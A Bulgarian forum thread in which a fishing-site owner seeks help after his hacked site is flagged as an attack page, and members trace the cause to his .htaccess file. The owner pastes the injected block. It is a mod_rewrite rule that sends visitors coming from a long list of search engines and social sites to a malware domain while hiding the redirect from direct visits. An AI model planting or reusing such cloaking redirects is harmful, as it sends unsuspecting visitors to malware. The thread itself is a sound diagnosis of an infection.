Моля за помощ сайта ми е докладван като атакуващ

pgplamen

Active Member
Моля за вашата помощ че вече не се издържа. Преди десетина дена ми изтриха сайтовете. След доста мъки и какво ли не успях да възстановя част от тях. Тъкмо бях започнал мече да се успокоявам днес нов проблем. Nod32 започна да пищи за проблеми, хора ми звъннаха че не се отваря сайта.От Google също не може да се отвори.Сайта е риболовен и се намира на адрес sukicarp.com Нямам идея какво да го правя.
Страницата е докладвана като „атакуваща“!

Страницата profitkilobics.ru е докладвана като „атакуващ“ и беше блокирана.

Атакуващите страници се опитват да инсталират програми, които крадат лична информация, повреждат компютъра ви или го използват за атака на други компютри.Някои от тези страници го правят съзнателно, но много са просто жертва и собствениците им не знаят нищо за това

От: Моля за помощ сайта ми е докладван като атакуващ

здравей,
какъв софтуер ползваш ? Да не би да е хакнат?

в момента този домейн ме пренасочва към http://kilobics-profit . ru/poch/index.php ?

Ами преди 10 дена беше хакнат изтрит до основи сега нямам идея от къде го прави това пренасочване и какво да търся.Самия сайт е писан. Прави го от началната страница следващите страници си работят. Когато напиша sukicarp.com/forum форума е нулиран.

Лоша работа.
При мен всички връзки в gogole търсенето към твоя сайт ги пренасочва към линка който дадох по-горе.

A когато го отворя директно през браузъра е наред.. това ме навежда на мисълта, че това пренасочване е още от деня в който е бил хакнат ... (незнам дали това предположение е вярно).

Дано някой който разбира повече в тази част каже как да оправиш проблема (аз се сещам само за GWT но не зам дали ще стане от там, междувременно може да направиш диагностика за словреден софтуер през GWT)

Последно редактирано:

Сега видях че е от .htaccess но нещо не ми дава да го презапиша. Някой да каже как точно трябва да изглежда ако може направен е някакъв редирект но не съм толкова в час.

HTML:
<IfModule mod_rewrite.c>                                                                                                                        
  RewriteEngine On                                                                                                                        
     RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)                                                                                                                        
                                                                                                                        RewriteRule ^(.*)$  [R=301,L]                                                                                                                        
                                                                                                                        </IfModule>                                                                                                                        

<IfModule mod_env.c>
        SetEnv PHPRC /users/sukicarp/public_html/php.ini
</IfModule>

сега изтрих целия файл на Гугъл ще му трябва ли време да оправи нещата. Сега ще прочета и това.

Мисля, че може да им пишеш да го преразгледат.

В .htaccess-a ти беше зададено посещенията от търсачки да се пренасочват. Явно търсачките още мислят, че сайта сочи на другаде. През това време си огледай добре защитите, явно този който е писал софтуера е допуснал доста грешки.

Горе